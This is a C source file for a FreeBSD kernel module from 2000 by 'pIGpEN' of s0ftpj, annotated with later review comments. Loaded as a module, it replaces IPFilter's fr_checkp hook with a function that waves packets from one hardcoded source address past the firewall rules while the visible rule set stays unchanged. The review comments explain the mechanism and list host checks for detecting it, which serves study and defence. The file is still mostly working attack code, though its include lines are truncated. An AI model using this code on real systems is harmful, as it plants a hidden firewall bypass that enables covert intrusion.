/*
 * Name: Filtering IPFiLTER
 * Date: Thu May 18 11:00:59 2000
 * Author: pIGpEN [ pigpen@s0ftpj.org, deadhead@sikurezza.org ]
 *
 * SoftProject 2000 - Digital Sekurity for Y2k
 * Sikurezza.org - Italian Security MailingList
 *
 * COFFEE-WARE LICENSE - This source code is like "THE BEER-WARE LICENSE" by
 * Poul-Henning Kamp but you can give me in return a coffee.
 *
 * Tested on: FreeBSD 3.4-RELEASE FreeBSD 3.4-RELEASE #7: Sun May i386
 *
 * IPFilter (like ipfw) uses a function pointer in ip_input() and ip_output()
 * in order to process packets ...
 *
 *   if(fr_checkp) {
 *       struct mbuf *m1 = m;
 *
 *       if((*fr_checkp)(ip, hlen, m->m_pkthdr.rcvif, 0, &m1) || !m1)
 *           return;
 *       ip = mtod(m=m1, struct ip *);
 *   }
 *
 * I give you a Makefile in append so don't write me for that !!! :)
 */

/*
 * Review summary.
 *
 * What the module does: at load time it saves the kernel's IPFilter hook
 * pointer (fr_checkp) in `fr` and replaces it with myfr().  myfr() returns 0
 * without consulting the saved filter when the packet's source address equals
 * GO_JOHNNY_GO, and forwards every other packet to the saved function.  Per
 * the ip_input() excerpt above, a zero return with a non-NULL mbuf lets the
 * IP stack continue processing, so packets from that address are never
 * evaluated against the IPFilter rule set.
 *
 * Why it matters: the rule set shown by the firewall's own tooling stays
 * unchanged while the code path that enforces it has been redirected, so a
 * rules audit alone does not reveal the exception.
 *
 * What to check on a host:
 *   - the list of loaded kernel linker files (kldstat) for entries that are
 *     not part of the expected build; the Makefile at the end of this file
 *     loads the module through /sbin/kldload as "ipfhack", while the module
 *     name registered below is "ipfil_mod";
 *   - whether fr_checkp still points into the IPFilter code rather than into
 *     a separately loaded module;
 *   - whether module loading is restricted at all: FreeBSD's securelevel
 *     mechanism (kern.securelevel above 0) refuses kldload/kldunload, which
 *     removes this vector on hosts that do not need runtime module loading.
 */

#define GO_JOHNNY_GO "192.168.1.3"
/* Source address whose packets are returned as "pass" without being handed to
 * the saved filter function (see myfr below). */

/* NOTE(review): the header name after each of the following #include
 * directives was lost when this page was extracted; the file does not compile
 * as shown. */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

/* IPFILTER FreeBSD Options */

typedef struct ip ip_t;
typedef struct mbuf mb_t;

/* A simple typedef for filter check prototypes: the signature of the function
 * that fr_checkp points to. */

typedef int ipfr_t __P((ip_t *, int, void *, int, mb_t **));

/* Prototypes */

static int s_load __P((struct module *, int, void *));
static u_int32_t inaton __P((const char *));

/* Kernel-global filter hook called from ip_input()/ip_output(). */
extern ipfr_t *fr_checkp;

/* myfr is the replacement hook; fr holds the value fr_checkp had at load
 * time so that it can be chained to and restored on unload. */
static ipfr_t myfr, *fr;

/*
 * Module event handler.
 *
 * MOD_LOAD:   saves the current fr_checkp in fr and points fr_checkp at
 *             myfr.
 * MOD_UNLOAD: writes the saved pointer back to fr_checkp.
 * Any other cmd falls through the switch untouched.
 *
 * Both pointer swaps are bracketed by splnet()/splx() so they are not
 * interleaved with network-level processing.  Always returns 0.
 *
 * NOTE(review): fr is stored without checking it.  The ip_input() excerpt in
 * the file header tests fr_checkp for NULL before calling it, which implies
 * the pointer can be NULL when no filter is attached; in that case myfr()
 * would call through a NULL fr for every non-matching packet.
 */
static int
s_load (struct module *module, int cmd, void *arg)
{
	int s;

	switch(cmd) {
	case MOD_LOAD:
		s = splnet();
		fr = fr_checkp;		/* remember the original hook */
		fr_checkp = myfr;	/* redirect filtering through myfr */
		splx(s);
		break;

	case MOD_UNLOAD:
		s = splnet();
		fr_checkp = fr;		/* put the saved hook back */
		splx(s);
		break;
	}

	return 0;
}

/* module struct: registers s_load as the event handler under the module name
 * "ipfil_mod". */

static moduledata_t s_mod_1 = {
	"ipfil_mod",
	s_load,
	0
};

DECLARE_MODULE(ipfil_mod, s_mod_1, SI_SUB_PSEUDO, SI_ORDER_ANY);

/*
 * Replacement filter hook installed in fr_checkp.
 *
 * Returns 0 immediately when ip->ip_src.s_addr equals the network-order value
 * of GO_JOHNNY_GO; otherwise returns whatever the saved hook fr returns for
 * the same arguments.
 *
 * The decision depends only on the source address field of the IP header;
 * hlen, ifp, out (direction) and the mbuf are not examined on the matching
 * path.  inaton() re-parses the constant string on every call.
 */
static int
myfr(ip_t *ip, int hlen, void *ifp, int out, mb_t **mp)
{
	if(ip->ip_src.s_addr == inaton(GO_JOHNNY_GO))
		return 0;

	return(fr(ip, hlen, ifp, out, mp));
}

/*
 * Converts a dotted-decimal string to a 32-bit address in network byte order.
 *
 * Runs four rounds; each round shifts the accumulator left by 8 bits, reads
 * decimal digits up to the next '.' or NUL into val, ORs val into the
 * accumulator and steps over the '.'.  For "192.168.1.3" the accumulator ends
 * as 0xC0A80103 before htonl().
 *
 * No validation is done: characters are not checked to be digits and val is
 * not limited to 0..255, so a component above 255 would spill into the bits
 * of the preceding octets.  In this file the only argument is the
 * GO_JOHNNY_GO constant.
 */
static u_int32_t
inaton(const char *str)
{
	unsigned long l;
	unsigned int val;
	int i;

	l = 0;
	for(i=0; i < 4; i++) {
		l <<= 8;
		if(*str != '\0') {
			val = 0;
			while(*str != '\0' && *str != '.') {
				val *= 10;
				val += *str - '0';
				str++;
			}
			l |= val;
			if(*str != '\0')
				str++;	/* skip the '.' separator */
		}
	}
	return(htonl(l));
}

/*
 * Makefile appended by the author; it is kept inside this C comment.
 * NOTE(review): the argument of the final .include directive was lost when
 * this page was extracted.
 *
# SoftProject 2000 - Digital Sekurity for Y2k
# Sikurezza.org - Italian Security MailingList
#
# COFFEE-WARE LICENSE - This source code is like "THE BEER-WARE LICENSE" by
# Poul-Henning Kamp but you can give me in return a coffee.
#
# Tested on: FreeBSD 3.4-RELEASE FreeBSD 3.4-RELEASE #3: Thu Mar i386
# < pigpen@s0ftpj.org >

.PATH:		/sys/kern
SRCS		= ipfhack.c
CFLAGS+		= -I/sys
KMOD		= ipfhack
NOMAN		= t
KLDMOD		= t

KLDLOAD		= /sbin/kldload
KLDUNLOAD	= /sbin/kldunload

CLEANFILES+	= ${KMOD}

load:
	${KLDLOAD} -v ./${KMOD}

unload:
	${KLDUNLOAD} -v -n ${KMOD}

.include
*/